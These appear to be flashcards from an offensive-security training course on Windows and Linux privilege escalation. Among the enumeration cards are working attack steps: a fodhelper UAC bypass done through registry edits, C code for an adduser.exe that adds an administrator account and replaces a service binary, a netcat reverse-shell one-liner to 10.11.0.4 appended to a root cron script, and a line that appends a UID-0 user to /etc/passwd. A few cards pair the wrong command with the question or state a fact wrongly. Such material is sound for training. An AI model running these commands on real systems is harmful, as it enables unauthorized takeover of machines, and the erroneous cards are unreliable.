Privilege Escalation Flashcards

1
Q

What is the process for enumerating users on a Windows machine?

A
  1. whoami
  2. net user
     - gains additional information about the user you are logged in with
  3. net users
     - discover other user accounts on the system
2
Q

What is the process for enumerating users on a Linux machine?

A
  1. whoami
  2. id
  3. cat /etc/passwd
     - enumerates other users on the system
3
Q

How do you enumerate the Operating System Version and Architecture on a Windows machine?

A

c:> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

4
Q

How do you enumerate the Operating System Version and Architecture on a Linux machine?

A
    • cat /etc/issue
    • cat /etc/*-release
    • uname -a
5
Q

How do you list running processes on a Windows machine?

A

tasklist /SVC

6
Q

How do you list running processes on a Linux machine?

A

ps axu

7
Q

How do you enumerate all TCP/IP network configurations on a Windows machine?

A

ipconfig /all

8
Q

How do you enumerate all TCP/IP network configurations on a Linux machine?

A

route print

9
Q

How do you list active network connections on a Windows machine?

A

netstat -ano

10
Q

How do you list active network connections on a Linux machine?

A
  • ifconfig
  • ip a
  • /sbin/route
  • ss -anp
11
Q

How do you enumerate firewall settings on a Windows system?

A
    • netsh advfirewall show currentprofile
    • netsh advfirewall firewall show rule name=all

12
Q

How do we enumerate Scheduled Tasks on a Windows system?

A

– schtasks /query /fo LIST /v

13
Q

How do we enumerate Scheduled Tasks on a Linux system?

A
    • ls -lah /etc/cron*
    • cat /etc/crontab

14
Q

How do we enumerate Installed Applications on a Windows machine?

A

– wmic product get name, version, vendor

15
Q

How do we enumerate Patch Levels on a Windows machine?

A

– wmic qfe get Caption, Description, HotFixID, InstalledOn

16
Q

How do we enumerate Installed Applications on a Linux machine?

A

dpkg -l

17
Q

On a Windows machine, how would you search for any file or directory in the Program Files directory that allows the ‘Everyone’ group ‘write’ permissions?

A

– accesschk.exe -uws "Everyone" "C:\Program Files"

18
Q

What PowerShell cmdlet retrieves all permissions for a given file or directory?

A

Get-Acl

19
Q

What additional cmdlet needs to be used with Get-Acl to run recursively?

A

Get-ChildItem

20
Q

How would we use Get-Acl and Get-ChildItem cmdlets to get every file and directory under the Program Files directory that allows the ‘Everyone’ group to modify?

A

Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

21
Q

In Linux, how do you find every directory writable by the current user on the target system?

A

find / -writable -type d 2>/dev/null

22
Q

How do you enumerate Unmounted Disks on a Windows machine?

A
  • mountvol
23
Q

How do we enumerate Unmounted Disks on a Linux machine?

A
  • cat /etc/fstab
  • mount
  • /bin/lsblk
24
Q

What are Device Drivers?

A

  • A 'driver' is a software component that lets the operating system and a device communicate with each other.

25
Q

In Windows, how can you enumerate Device Drivers and Kernel Modules?

A
    • C:> powershell
    • PS C:> driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path

26
Q

In Windows, how can we get a list of Loaded Drivers?

A
  • We can use the Get-WmiObject cmdlet to get the Win32_PnPSignedDriver WMI instance, which provides digital signature information about the drivers
    • Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "VMware"}
27
Q

How can we enumerate the Loaded Kernel Modules?

A

– lsmod

28
Q

How can we find out more information about a specific Kernel Module in Linux? (Ex. ‘libata’ Kernel Module)

A

– /sbin/modinfo libata

29
Q

On Windows systems, which registry setting should be checked on which registries for a “privesc shortcut”?
Why and How?

A
  • On Windows systems, we should check the status of the ‘AlwaysInstallElevated’ registry setting
  • If this key is set to ‘1’ (enabled) in either HKEY_CURRENT_USER or HKEY_LOCAL_MACHINE, any user can run Windows Installer packages with Elevated Privileges.
  • We can use ‘reg query’ to check these settings:
    • C:> reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    • C:> reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
30
Q

In Linux, what should we search for to see if we can get files to run as the ‘root’ user? How is this located?

A
  • SUID files
  • if the SUID permission is set on a binary it will run with the permissions of the file owner
  • if a binary has the SUID bit set and the file is owned by ‘root’, any local user will be able to execute that binary with elevated privileges
    • find / -perm -u=s -type f 2>/dev/null
31
Q

What is an automated tool to check for Windows privesc vulnerabilities? what command will provide all privesc vulns and groups?

A
  • windows-privesc-check
    • C:> windows-privesc-check2.exe --dump -G

32
Q

What is an automated tool to check for Linux privesc vulnerabilities?

A
  • unix-privesc-check
33
Q

How are privileges managed on Windows?

A
  • Once a user is authenticated, Windows generates an access token that is assigned to that user
  • The token itself contains various pieces of information that effectively describe the security context of a given user, including privileges
  • Access tokens are assigned a 'security identifier' (SID)
34
Q

In addition to privileges, what has Windows implemented to assign trust levels to application processes and securable objects? What are the levels?

A
  • Integrity Levels
  • This describes the level of trust the operating system has in running applications or securable objects
  • The configured Integrity Level dictates what actions an application can perform, including the ability to read or write to the local file system
  • There are four Integrity Levels:
    • System Integrity Process: System rights
    • High Integrity Process: Administrative rights
    • Medium Integrity Process: Standard user rights
    • Low Integrity Process: very restricted rights often used in sandboxed processes
35
Q

What Windows command displays Integrity Levels in action?

A

– c:> whoami /groups

36
Q

What security tokens does an Administrative user have, and what mechanism acts as a separation between those two Integrity Levels?

A
  • The Administrative user has two security tokens:
    • medium integrity level token
    • high integrity level token
  • UAC acts as the separation mechanism between those two integrity levels
37
Q

Explain UAC

A
  • User Account Control
  • Forces applications and tasks to run in the context of a non-administrative account until an Administrator authorizes elevated access
  • UAC will block installers and unauthorized applications from running without the permissions of an administrative account
  • Two UAC modes:
    • credential prompt
    • consent prompt
38
Q

When does a UAC Credential Prompt get triggered?

A
  • When a standard user wishes to perform an administrative task, such as installing a new application
  • The credentials of an Administrative User will be required to complete the install
39
Q

When does a UAC Consent Prompt get triggered?

A
  • When an administrative user wishes to perform an administrative task
  • The administrative user simply has to confirm that the task should be completed
40
Q

Why would an administrative user be blocked from changing their password in a cmd prompt?

A
  • Because UAC is enabled and the CMD terminal is running with the administrative user's medium integrity level token
41
Q

UAC Bypass Exploit

A
  • Windows 10 build 1709
  • Leverages a UAC bypass based on fodhelper.exe
  • This application is launched whenever a local user selects the “Manage optional features” option in the “Apps & Features” Windows Settings screen
    • C:> \windows\System32\fodhelper.exe
42
Q

How can you get information about an application, such as required permissions to run and whether the application autoElevates privileges?

A
  • The Application Manifest is an XML file containing information that lets the operating system know how to handle the program when it is started.
  • We can inspect the manifest with the ‘sigcheck’ utility from ‘Sysinternals’
    • C:> cd C:\Tools\Privilege_escalation\SysinternalsSuite
    • C:\Sysin..> sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe
43
Q

When viewing the Application Manifest for an application, how do you know if the executable can auto-elevate to ‘high integrity’ w/o UAC prompt?

A
  • the ‘autoElevate’ flag is set to ‘True’
44
Q

How do you use Procmon to analyze an application such as ‘fodhelper.exe’?

A
  1. Run procmon.exe (sysinternals)
  2. Filter on process named ‘fodhelper.exe’
  3. Run ‘fodhelper.exe’
  4. Filter on ‘Result’ value of ‘NAME NOT FOUND’, which shows ‘fodhelper.exe’ attempting to access registry keys that do not exist.
  5. Focus on registry that we, as the current user, can control (HKEY_CURRENT_USER)(HKCU); Filter on ‘Path’ contains ‘HKCU’
  6. We see that ‘fodhelper.exe’ is trying to access HKCU:\Software\Classes\ms-setting\open\command registry key, which does not appear to exist.
45
Q

Explain the ‘fodhelper.exe’ exploit

A
  1. Attempts to access 'HKCU:\Software\Classes\ms-setting\open\command' registry, but gets a 'NAME NOT FOUND' result (procmon)
  2. When it fails above, it next tries to access the same key in HKEY_CLASSES_ROOT
  3. Let's add the registry to HKCU instead:
     - C:> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
  4. Rerunning 'fodhelper.exe' in procmon, we see that it attempts to query a value 'DelegateExecute' stored in HKCU
  5. Next, we add the 'DelegateExecute' entry to our registry:
     - C:> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
  6. Now, we see that 'fodhelper.exe' has a SUCCESS result (procmon) and finds the new 'DelegateExecute' entry, but finds an empty (Default) value
  7. Finally, let's replace the empty (Default) value with cmd.exe
     - C:> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
  8. Running 'fodhelper.exe' now results in a CMD shell with admin access (high-integrity token) and we have bypassed UAC
46
Q

How can you make a Registry entry execute a program, such as cmd.exe?

A
  • Setting the 'DelegateExecute' key value to an empty value (REG_SZ) and then setting the (Default) value to cmd.exe
    • C:> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
    • C:> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
47
Q

How are Insecure File Permissions exploited?

A
  1. Program runs as a Windows service
  2. During install, the program receives full read write access to all members of the Everyone group
  3. The program is replaced with a malicious file
  4. The service is restarted and the malicious file is executed with SYSTEM privileges
48
Q

What is a directory to look in for possible Insecure File Permission exploits?

A
  • Program Files

- These services are user-installed, and have a potential to be installed with elevated privileges

49
Q

What PowerShell one-liner allows you to list the name of ‘running’ services and the Path where they are installed?

A

PS C:> Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}

50
Q

What is ‘icacls’?

A
  • Windows utility that outputs the Security Identifiers (SIDs) followed by a permission mask
    • C:> icacls "C:\Program Files\Serviio\bin\ServiioService.exe"
51
Q

What are the ‘icacls’ permission masks?

A
  • F = Full Access
  • M = Modify Access
  • RX = Read and execute access
  • R = Read-only access
  • W = Write-only access
52
Q

After running 'icacls' on ServiioService.exe, you see it has the following permission; what can you do to exploit this?
- BUILTIN\Users:(I)(F)

A
  • Any user (BUILTIN\Users) has Full-Access
  • We can replace ServiioService.exe with our own malicious binary
  • We can then reboot the service and execute our malicious binary
53
Q

How would you create a malicious binary file named ‘adduser.exe’ that creates a user named ‘evil’ and adds this user to the ‘administrators’ group?

How would you replace the existing ServiioService.exe with ‘adduser.exe’?

How would you get ‘adduser.exe’ to execute?

A
  1. Create a 'C' file 'adduser.c' with the following code (the system() calls need stdlib.h):

     #include <stdlib.h>

     int main()
     {
        int i;

        i = system("net user evil Ev!lpass /add");
        i = system("net localgroup administrators evil /add");

        return 0;
     }

  2. Cross-compile the code on our Kali machine with 'i686-w64-mingw32-gcc', using -o to specify the name of the compiled output:
     - kali:~$ i686-w64-mingw32-gcc adduser.c -o adduser.exe
  3. Transfer 'adduser.exe' to our target and replace 'ServiioService.exe'
     - C:> move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe"
     - C:> move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe"
  4. Restart the Serviio service
     - C:> net stop Serviio
     - C:> net start Serviio

54
Q

In Windows, how can we tell if a service (ex. Serviio) will restart on a reboot?

A
  • If the 'startmode' value is 'Auto', it will automatically start on a reboot
    • C:> wmic service where caption="Serviio" get name, caption, state, startmode
55
Q

In Windows, how can you tell if your user has permission to reboot the system?

A
  • If the user has the privilege 'SeShutdownPrivilege'
    • C:> whoami /priv

56
Q

In Windows, how do you reboot the system?

A

C:> shutdown /r /t 0

57
Q

When do you try to take advantage of Unquoted Service Paths?

A
  • when we have write permissions to a service’s main directory and subdirectories, but cannot replace files within them
  • Each Windows service maps to an executable file that will be run when the service is started.
  • Most of the time, services that accompany third party software are stored under the C:\Program Files directory
58
Q

Exploiting Unquoted Service Paths

A
  • when using file or directory paths that contain spaces, the developers should always ensure that they are enclosed by quotation marks
  • this ensures that they are explicitly declared
  • However, when this is not the case and a path is unquoted, it is open to interpretation
  • Specifically, in the case of executable paths, anything that comes after each whitespace character will be treated as a potential argument or option for the executable
59
Q

How will Windows attempt to run the executable service.exe from the path C:\Program Files\My Program\My Service\service.exe?

A
  1. C:\Program.exe
  2. C:\Program Files\My.exe
  3. C:\Program Files\My Program\My.exe
  4. C:\Program Files\My Program\My Service\service.exe
60
Q

How would you try to exploit the Unquoted Service Path vulnerability in the path C:\Program Files\My Program\My Service\service.exe? What would be the ideal outcome?

A
  • Place a malicious executable named ‘My.exe’ in either the ‘C:\Program Files\My Program’ directory or ‘C:\Program Files\My Program\My Service’ directory.
  • The ideal outcome would be when the service runs, it should execute the malicious ‘My.exe’ with the same privileges that the service starts with
  • Often, these privileges are the NT\System account, which would result in a successful privilege escalation attack
61
Q

What is something important to keep in mind when exploiting Windows Kernel vulnerabilities?

A
  • When attempting to exploit system-level software (such as drivers or the kernel itself), we must pay careful attention to several factors:
    • the target’s OS
    • version
    • architecture
  • Failure to accurately identify these factors can trigger a BSOD
62
Q

What attack surface should be investigated first when attempting to exploit Windows Kernel vulnerabilities?

A
  • Third-party driver exploits are more common, and as such, we should always attempt to investigate this attack surface first
  • Native kernel vulnerabilities are less common and more difficult to exploit
63
Q

What command displays the Windows OS version and architecture?

A

– C:> systeminfo | findstr /B /C:”OS Name” /C:”OS Version” /C:”System Type”

64
Q

What command displays the Windows OS drivers?

A
    • C:> driverquery /v
  • Note: this output primarily consists of typical Microsoft-installed drivers and third party drivers

65
Q

If you are trying to get version information about a program, such as USBPcap, what command should you use?

A

– C:> type USBPcap.inf

66
Q

How do we enumerate Windows Kernel vulnerabilities?

A
  1. Find the OS version and architecture
     – C:> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
  2. Enumerate the drivers that are installed on the system
     – C:> driverquery /v
  3. Query 'searchsploit' for any exploits for third party drivers discovered, looking specifically for exploits that match the driver version number
67
Q

What programming language are most exploits that target kernel-level vulnerabilities written in?
How does this impact exploit development?

A
  • the vast majority of exploits targeting kernel-level vulnerabilities are written in a low-level programming language such as C or C++
  • therefore, exploits must be compiled
  • ideally, we want to compile code on the platform version we are attacking, and should spin up a VM that matches our target, and compile the code there
  • However, we can also cross-compile the code on an operating system entirely different from the one we are targeting
68
Q

If our target Windows machine has ‘mingw-w64.bat’ installed, how can we create an executable compiled to run on this machine? Assume the example exploit is ‘41542.c’

A
  1. Run the 'mingw-w64.bat' script that sets up the PATH env variable for the 'gcc' executable
     - C:> mingw-w64.bat
  2. Run gcc to make sure it is working properly
     - C:> gcc -help
  3. Transfer the exploit code to the Windows client and compile it
     - C:> gcc 41542.c -o exploit.exe
     - Note: you may get warnings, but it still works
  4. Run malicious executable
69
Q

What characteristics of a file on a Linux system do we look for to exploit Insecure File Permissions?

A
  • an executable file
  • allows us write access
  • runs at an elevated privilege level
70
Q

What is a prime target on Linux systems for exploiting Insecure File Permissions?

A
  • the ‘cron’ time-based job scheduler
  • system-level jobs are executed with root user privileges and system admins often create scripts for cron jobs with insecure permissions
71
Q

Where should we look for installed cron jobs on a Linux system?

A
    • ls -lah /etc/cron*
    • cat /etc/crontab
    • grep "CRON" /var/log/cron.log
72
Q

Given a CRON job that executes a script '/var/scripts/user_backups.sh' that runs with root privileges, how would we determine if local (low-level) users have write permissions to the script?

A

– ls -lah /var/scripts/user_backups.sh

73
Q

What is the reverse shell one-liner to add to scripts in linux when exploiting Insecure File permissions?

A
  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f| /bin/sh -i 2>&1|nc 10.11.0.4 1234 >/tmp/f
  • rm /tmp/f = removes any existing named pipes
  • mkfifo /tmp/f = creates a named pipe
  • cat /tmp/f|/bin/sh -i = creates an interactive shell on the local machine and hooks the output of the pipe to the shell's input
  • 2>&1|nc 10.11.0.4 1234 = takes the output of the shell and sends it over the network to a machine listening on port 1234 at 10.11.0.4
  • > /tmp/f = takes the output of 'nc' and sends it to the named pipe's input, where it becomes input for the shell
74
Q

Given an existing script ‘user_backups.sh’, how would you write a reverse shell one-liner to it so it will connect to an attacking machine at 10.11.0.4 on 1234 when ‘user_backups.sh’ is run by the CRON job?

A

– echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f| /bin/sh -i 2>&1|nc 10.11.0.4 1234 >/tmp/f" >> user_backups.sh

75
Q

How can /etc/passwd be used to exploit Insecure File Permissions in Linux?

A
  • Linux passwords are stored in /etc/shadow
  • password hashes are stored in /etc/passwd
  • If a password hash is present in the second column of a /etc/passwd user record, it is considered valid for authentication and takes precedence over the respective entry in /etc/shadow
  • This means that if we can write into the /etc/passwd file, we can effectively set an arbitrary password for any account
76
Q

On Linux, what algorithm is used to generate password hashes?

A
  • crypt algorithm
77
Q

Give an example of how to exploit Insecure File Permissions in Linux by creating a root user named ‘root2’ that is apart of the ‘root’ group

A
  1. Generate the password hash for 'evil'
     - openssl passwd evil
  2. Write the generated password hash to the /etc/passwd file for the user 'root2' and add it to the 'root' user group
     - echo "root2:AD24fcSx2Il3I:0:0:root:/root:/bin/bash" >> /etc/passwd
78
Q

What are the commands you should run to enumerate kernel vulnerabilities on a Linux machine?

A
    • cat /etc/issue
    • uname -r
    • searchsploit linux kernel
  • Ex: searchsploit linux kernel Ubuntu 16.04
79
Q

Given the exploit ‘43418.c’ how would you compile it to run on Linux?

A

– gcc 43418.c -o exploit